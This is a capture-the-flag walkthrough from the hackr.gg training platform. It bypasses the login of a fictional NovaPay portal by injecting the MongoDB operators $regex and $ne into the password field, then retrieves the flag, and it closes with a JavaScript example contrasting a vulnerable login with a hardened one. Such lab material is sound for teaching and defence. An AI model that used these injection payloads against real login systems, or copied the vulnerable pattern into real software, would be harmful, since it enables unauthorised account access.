HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

NovaPay — MongoDB Injection

Difficulty: Intermediate
Vuln class: NoSQL Injection — Operator Injection
Steps: 3
// Objective
Bypass the NovaPay internal portal login using MongoDB operator injection.
// Tools required
Browser, Burp Suite, curl
// Step-by-step walkthrough
1. Identify the injection point
The login form sends JSON. Test if MongoDB operators are accepted by injecting $regex to match any password.
Command / Input
POST /api/login {"username":"admin","password":{"$regex":".*"}}
Output
{"error":"Invalid credentials"}
If the $regex payload returns an error rather than a 401, the query parser is interpreting operators.
2. Use $ne for full bypass
Inject $ne so the query matches any document whose password is not equal to the supplied value (null in the request below).
Command / Input
POST /api/login {"username":"admin","password":{"$ne":null}}
Output
{"token":"eyJ...","user":"admin"}
3. Get the flag
Use the admin token to access the protected dashboard.
Command / Input
GET /api/admin/flag
Authorization: Bearer TOKEN
Output
{"flag":"HackrGG{n0sql_0p3r4t0r_1nj3ct10n_byp4ss}"}
// Flag
Flag value
HackrGG{n0sql_0p3r4t0r_1nj3ct10n_byp4ss}
In the admin dashboard, accessible after $ne operator injection bypasses login.
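
The flaw behind step 2 and its fix, as an added example that is not NovaPay's or hackr.gg's code. It uses a constructed in-memory stand-in for the users collection; the `users` array, `matches`, `findOne` and both login functions are hypothetical names, and only equality and `$ne` matching are modelled.

```javascript
// Constructed sample data standing in for a MongoDB "users" collection.
const users = [{ username: "admin", password: "s3cret-constructed" }];

// Minimal model of filter matching (assumption: only equality and $ne).
// An object carrying "$ne" is treated as an operator, not as a value.
function matches(docValue, cond) {
  if (cond !== null && typeof cond === "object" && "$ne" in cond) {
    return docValue !== cond.$ne;
  }
  return docValue === cond;
}

// Stand-in for collection.findOne(filter): every field must match.
function findOne(filter) {
  const hit = users.find((u) =>
    Object.entries(filter).every(([key, cond]) => matches(u[key], cond))
  );
  return hit || null;
}

// Vulnerable pattern: parsed JSON values go into the filter with whatever
// type the client sent, so {"$ne": null} arrives as an operator.
function loginVulnerable(body) {
  const filter = { username: body.username, password: body.password };
  return findOne(filter) !== null;
}

// Hardened pattern: accept only string credentials, so an operator object
// can never reach the query layer.
function loginHardened(body) {
  const { username, password } = body || {};
  if (typeof username !== "string" || typeof password !== "string") {
    return false; // a real handler would answer HTTP 400 here
  }
  return findOne({ username, password }) !== null;
}
```

A production handler would go further: look the user up by username only and verify a password hash in application code, which keeps the password out of the query filter entirely.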